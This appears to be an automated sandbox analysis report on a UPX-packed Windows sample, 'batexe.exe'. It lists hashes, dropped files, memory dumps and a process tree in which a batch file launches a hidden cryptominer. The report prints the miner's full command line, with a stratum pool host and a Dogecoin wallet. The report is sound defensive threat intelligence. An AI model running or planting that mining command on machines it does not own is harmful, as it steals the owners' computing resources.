73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
296s
platform
windows10-1703_x64
resource
win10-20231215-ja
resource tags

arch:x64arch:x86image:win10-20231215-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
14/02/2024, 04:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
32	b2e.exe
1268	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1268	cpuminer-sse2.exe
1268	cpuminer-sse2.exe
1268	cpuminer-sse2.exe
1268	cpuminer-sse2.exe
1268	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2580-5-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2580 wrote to memory of 32	2580	batexe.exe	74
PID 2580 wrote to memory of 32	2580	batexe.exe	74
PID 2580 wrote to memory of 32	2580	batexe.exe	74
PID 32 wrote to memory of 5008	32	b2e.exe	75
PID 32 wrote to memory of 5008	32	b2e.exe	75
PID 32 wrote to memory of 5008	32	b2e.exe	75
PID 5008 wrote to memory of 1268	5008	cmd.exe	78
PID 5008 wrote to memory of 1268	5008	cmd.exe	78

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:32
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9143.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe

Filesize
10.0MB

MD5
6a51bb3137fdf37d27ec3c32967f4c74

SHA1
e4f0065b6d6afa306ff8469cb8364fe5313efb2c

SHA256
936355e1aa9f0fd51335946cd316842147045c9cb7ff31c3ac7e1133c58111d5

SHA512
ca40ab86661caa1ef62331b552019b8ac687b98f36c59dd03f861a9ed2c500384357c4dcbae993bc4376bfcc0ed0ad74d0ba8f0530833abf930e0863b623d2bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\8F6F.tmp\b2e.exe

Filesize
8.0MB

MD5
dca9c934b8e5ef624c66ffdacfe3aacc

SHA1
091e6c0008abb93bdd5e32d3f7429dbd24d2f12e

SHA256
e568891c95b20ee1dd1fb55482c4a2c61313725adb1ad666cc47304a0ad52f71

SHA512
be9eb9228785115d611c53d25da42354ce400461e3e7e9eeac2cd0a417dbff4fa0aff2df138709f6ec8626f8d526302923f89f67fcb06fdd762dfa9ddf05392a

Download Submit
C:\Users\Admin\AppData\Local\Temp\9143.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
2.3MB

MD5
4c04147c386ba8792ac6a03069572a8a

SHA1
dda67789fc1d0f2469ca95f01a5c81034853ca6a

SHA256
c7739a1e940a282703d06eccda7110426d306f390e97fdbbd9df18472fd132cd

SHA512
a8b5a0b878a9a7d30cb38feff814e1f4dce24d000158edc10a43ee9a89920bedf7adc92eb7e3913098b6aab7fbd0531f56fc09f508b5c2769992a94e55d153db

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.4MB

MD5
c8daa1ce8c442f5f5efdfc488389671f

SHA1
eeebea5269f1aa62d89fdfc63fa8623585d9a136

SHA256
7da0bb84a7dbe470cd656f55531336eb3a8c3069974c7183e8e6983e2d947c64

SHA512
af7cb836c3d6610f9bef72b05ea5ef644f89debd961e743bdb5a4d3a273aef1ecb25a5f4fa49343dbc42c46c6bb2445b081aaf2f0d03c93bb9df526ce44741b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.6MB

MD5
5e154e1f428d420fe7bd607f1392df54

SHA1
0e8b01587f5ccd8ef811ef56c901bb52e3ed87c1

SHA256
6726b07a172ebd0d780afc0ba87eb06dbdcdd1c1a43e844b49b039fa1edb35d0

SHA512
3a7980433afbb0ed695093761f5e1a1d6d029933aef5581ff3d2bd27017102f55260de8ae87b3f20b785e70c75e6d525a1da9680f5d42adc8f7d8c434db02dd3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
3.4MB

MD5
b2c9a888066f5743c6f2a7b561bb1faa

SHA1
bf31ee86fb739ae62764ce48c478679da8b41076

SHA256
03b52e9ebdb1f54abc9352ba703d6c02dc066a10defa576cf7f346c75ecc412b

SHA512
9ae02eda9e5a02d009e94de1bf6961c95980aa978dd1a1245d95150a34cdaca8d594b5854e6e414c661c74b95c34abf3fa73b3e3daedbe97fc68f68e6309e2dc

Download Submit
memory/32-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/32-6-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1268-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1268-43-0x000000005C0D0000-0x000000005C168000-memory.dmp

Filesize
608KB

Download
memory/1268-44-0x00000000010D0000-0x0000000002985000-memory.dmp

Filesize
24.7MB

Download
memory/1268-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1268-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1268-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2580-5-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download